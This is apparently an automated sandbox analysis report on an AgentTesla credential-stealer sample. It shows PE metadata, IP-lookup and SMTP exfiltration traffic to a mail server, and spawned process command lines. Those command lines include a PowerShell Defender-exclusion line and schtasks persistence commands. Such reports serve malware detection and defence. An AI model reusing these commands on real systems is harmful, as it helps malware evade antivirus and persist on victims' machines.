                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                        Serial:7C1118CBBADC95DA3752C46E47A27438

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb54c40x57.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x600.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0xb40000x3608
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xb80000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000xb35240xb36008f2864563c3b314a2ba1b162239976d0False0.9646763392857143data7.957426352792891IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0xb60000x6000x600b146891dd717b61da6f53a87523710eeFalse0.4270833333333333data4.080006700599184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xb80000xc0x200f3892d1d62724674fbbf8715036c2145False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_VERSION0xb60900x2f8data0.45921052631578946
                        RT_MANIFEST0xb63980x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        May 21, 2024 13:45:30.219183922 CEST49710443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:30.219278097 CEST44349710104.26.13.205192.168.2.9
                        May 21, 2024 13:45:30.219367027 CEST49710443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:30.226900101 CEST49710443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:30.226934910 CEST44349710104.26.13.205192.168.2.9
                        May 21, 2024 13:45:30.800045967 CEST44349710104.26.13.205192.168.2.9
                        May 21, 2024 13:45:30.800131083 CEST49710443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:30.805169106 CEST49710443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:30.805224895 CEST44349710104.26.13.205192.168.2.9
                        May 21, 2024 13:45:30.805771112 CEST44349710104.26.13.205192.168.2.9
                        May 21, 2024 13:45:30.856681108 CEST49710443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:30.886470079 CEST49710443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:30.932117939 CEST44349710104.26.13.205192.168.2.9
                        May 21, 2024 13:45:31.055871010 CEST44349710104.26.13.205192.168.2.9
                        May 21, 2024 13:45:31.056036949 CEST44349710104.26.13.205192.168.2.9
                        May 21, 2024 13:45:31.056171894 CEST49710443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:31.069188118 CEST49710443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:31.785428047 CEST49712587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:31.841042042 CEST58749712212.44.102.65192.168.2.9
                        May 21, 2024 13:45:31.841154099 CEST49712587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:32.722377062 CEST58749712212.44.102.65192.168.2.9
                        May 21, 2024 13:45:32.722567081 CEST49712587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:32.736687899 CEST58749712212.44.102.65192.168.2.9
                        May 21, 2024 13:45:32.925565004 CEST58749712212.44.102.65192.168.2.9
                        May 21, 2024 13:45:32.925744057 CEST49712587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:32.930850029 CEST58749712212.44.102.65192.168.2.9
                        May 21, 2024 13:45:33.125586987 CEST58749712212.44.102.65192.168.2.9
                        May 21, 2024 13:45:33.169106960 CEST49712587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:33.236957073 CEST49713443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:33.237035036 CEST44349713104.26.13.205192.168.2.9
                        May 21, 2024 13:45:33.237241030 CEST49713443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:33.241331100 CEST49713443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:33.241369009 CEST44349713104.26.13.205192.168.2.9
                        May 21, 2024 13:45:33.731309891 CEST44349713104.26.13.205192.168.2.9
                        May 21, 2024 13:45:33.731403112 CEST49713443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:33.733197927 CEST49713443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:33.733237028 CEST44349713104.26.13.205192.168.2.9
                        May 21, 2024 13:45:33.733583927 CEST44349713104.26.13.205192.168.2.9
                        May 21, 2024 13:45:33.767318010 CEST49712587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:33.794280052 CEST49713443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:33.836127996 CEST44349713104.26.13.205192.168.2.9
                        May 21, 2024 13:45:33.971215963 CEST44349713104.26.13.205192.168.2.9
                        May 21, 2024 13:45:33.971842051 CEST44349713104.26.13.205192.168.2.9
                        May 21, 2024 13:45:33.971901894 CEST49713443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:33.974024057 CEST49713443192.168.2.9104.26.13.205
                        May 21, 2024 13:45:34.498406887 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:34.506289005 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:34.506362915 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.102060080 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.102263927 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.107146978 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.302222013 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.303137064 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.356950998 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.506542921 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.507210970 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.512511969 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.714023113 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.714044094 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.714185953 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.717343092 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.717355013 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.717416048 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.734257936 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.828978062 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.972925901 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:35.979861021 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:35.984785080 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.177222013 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.178621054 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:36.183584929 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.375930071 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.377028942 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:36.381953001 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.609577894 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.610035896 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:36.614994049 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.807090998 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:36.807439089 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:36.821430922 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.071655989 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.071993113 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:37.076914072 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.268383026 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.269121885 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:37.269212961 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:37.269247055 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:37.269275904 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:45:37.274085045 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.324959993 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.324969053 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.324978113 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.617010117 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:45:37.669178009 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:47:14.528971910 CEST49716587192.168.2.9212.44.102.65
                        May 21, 2024 13:47:14.536735058 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:47:14.729302883 CEST58749716212.44.102.65192.168.2.9
                        May 21, 2024 13:47:14.730031013 CEST49716587192.168.2.9212.44.102.65

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        May 21, 2024 13:45:30.185522079 CEST6521153192.168.2.91.1.1.1
                        May 21, 2024 13:45:30.196038008 CEST53652111.1.1.1192.168.2.9
                        May 21, 2024 13:45:31.670753002 CEST5033453192.168.2.91.1.1.1
                        May 21, 2024 13:45:31.784424067 CEST53503341.1.1.1192.168.2.9

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        May 21, 2024 13:45:30.185522079 CEST192.168.2.91.1.1.10x793cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                        May 21, 2024 13:45:31.670753002 CEST192.168.2.91.1.1.10xba83Standard query (0)mail.stilbo.euA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        May 21, 2024 13:45:30.196038008 CEST1.1.1.1192.168.2.90x793cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                        May 21, 2024 13:45:30.196038008 CEST1.1.1.1192.168.2.90x793cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                        May 21, 2024 13:45:30.196038008 CEST1.1.1.1192.168.2.90x793cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                        May 21, 2024 13:45:31.784424067 CEST1.1.1.1192.168.2.90xba83No error (0)mail.stilbo.eu212.44.102.65A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • api.ipify.org

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.949710104.26.13.2054437764C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        TimestampBytes transferredDirectionData
                        2024-05-21 11:45:30 UTC155OUTGET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Host: api.ipify.org
                        Connection: Keep-Alive
                        2024-05-21 11:45:31 UTC211INHTTP/1.1 200 OK
                        Date: Tue, 21 May 2024 11:45:31 GMT
                        Content-Type: text/plain
                        Content-Length: 12
                        Connection: close
                        Vary: Origin
                        CF-Cache-Status: DYNAMIC
                        Server: cloudflare
                        CF-RAY: 887452185b141a0f-EWR
                        2024-05-21 11:45:31 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
                        Data Ascii: 8.46.123.175


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.949713104.26.13.2054438092C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        TimestampBytes transferredDirectionData
                        2024-05-21 11:45:33 UTC155OUTGET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Host: api.ipify.org
                        Connection: Keep-Alive
                        2024-05-21 11:45:33 UTC211INHTTP/1.1 200 OK
                        Date: Tue, 21 May 2024 11:45:33 GMT
                        Content-Type: text/plain
                        Content-Length: 12
                        Connection: close
                        Vary: Origin
                        CF-Cache-Status: DYNAMIC
                        Server: cloudflare
                        CF-RAY: 8874522a8f2f8c78-EWR
                        2024-05-21 11:45:33 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
                        Data Ascii: 8.46.123.175


                        SMTP Packets

                        TimestampSource PortDest PortSource IPDest IPCommands
                        May 21, 2024 13:45:32.722377062 CEST58749712212.44.102.65192.168.2.9220-rcp-9.controlpanel.si ESMTP Exim 4.96.2 #2 Tue, 21 May 2024 13:45:32 +0200
                        220-We do not authorize the use of this system to transport unsolicited,
                        220 and/or bulk e-mail.
                        May 21, 2024 13:45:32.722567081 CEST49712587192.168.2.9212.44.102.65EHLO 878411
                        May 21, 2024 13:45:32.925565004 CEST58749712212.44.102.65192.168.2.9250-rcp-9.controlpanel.si Hello 878411 [8.46.123.175]
                        250-SIZE 52428800
                        250-8BITMIME
                        250-PIPELINING
                        250-PIPECONNECT
                        250-AUTH PLAIN LOGIN
                        250-STARTTLS
                        250 HELP
                        May 21, 2024 13:45:32.925744057 CEST49712587192.168.2.9212.44.102.65STARTTLS
                        May 21, 2024 13:45:33.125586987 CEST58749712212.44.102.65192.168.2.9220 TLS go ahead
                        May 21, 2024 13:45:35.102060080 CEST58749716212.44.102.65192.168.2.9220-rcp-9.controlpanel.si ESMTP Exim 4.96.2 #2 Tue, 21 May 2024 13:45:34 +0200
                        220-We do not authorize the use of this system to transport unsolicited,
                        220 and/or bulk e-mail.
                        May 21, 2024 13:45:35.102263927 CEST49716587192.168.2.9212.44.102.65EHLO 878411
                        May 21, 2024 13:45:35.302222013 CEST58749716212.44.102.65192.168.2.9250-rcp-9.controlpanel.si Hello 878411 [8.46.123.175]
                        250-SIZE 52428800
                        250-8BITMIME
                        250-PIPELINING
                        250-PIPECONNECT
                        250-AUTH PLAIN LOGIN
                        250-STARTTLS
                        250 HELP
                        May 21, 2024 13:45:35.303137064 CEST49716587192.168.2.9212.44.102.65STARTTLS
                        May 21, 2024 13:45:35.506542921 CEST58749716212.44.102.65192.168.2.9220 TLS go ahead

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:1
                        Start time:07:45:26
                        Start date:21/05/2024
                        Path:C:\Users\user\Desktop\SMBKT-20242005.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\SMBKT-20242005.exe"
                        Imagebase:0x970000
                        File size:751'112 bytes
                        MD5 hash:52CD4C12A51D55526CEAA5F1E7F9E549
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:3
                        Start time:07:45:28
                        Start date:21/05/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"
                        Imagebase:0xcd0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:4
                        Start time:07:45:28
                        Start date:21/05/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff70f010000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:07:45:28
                        Start date:21/05/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"
                        Imagebase:0xf40000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:07:45:28
                        Start date:21/05/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff70f010000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:07:45:29
                        Start date:21/05/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Imagebase:0x110000
                        File size:45'984 bytes
                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:07:45:29
                        Start date:21/05/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Imagebase:0xf80000
                        File size:45'984 bytes
                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1473242520.000000000338C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1473242520.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1473242520.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:9
                        Start time:07:45:30
                        Start date:21/05/2024
                        Path:C:\Users\user\AppData\Roaming\joUXSCpr.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\joUXSCpr.exe
                        Imagebase:0x8a0000
                        File size:751'112 bytes
                        MD5 hash:52CD4C12A51D55526CEAA5F1E7F9E549
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 37%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:10
                        Start time:07:45:30
                        Start date:21/05/2024
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff72d8c0000
                        File size:496'640 bytes
                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:11
                        Start time:07:45:32
                        Start date:21/05/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp"
                        Imagebase:0xf40000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:12
                        Start time:07:45:32
                        Start date:21/05/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff70f010000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:13
                        Start time:07:45:32
                        Start date:21/05/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Imagebase:0x200000
                        File size:45'984 bytes
                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:14
                        Start time:07:45:32
                        Start date:21/05/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Imagebase:0x370000
                        File size:45'984 bytes
                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:15
                        Start time:07:45:32
                        Start date:21/05/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Imagebase:0xd90000
                        File size:45'984 bytes
                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2663210822.000000000310F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:11.2%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:233
                          Total number of Limit Nodes:12
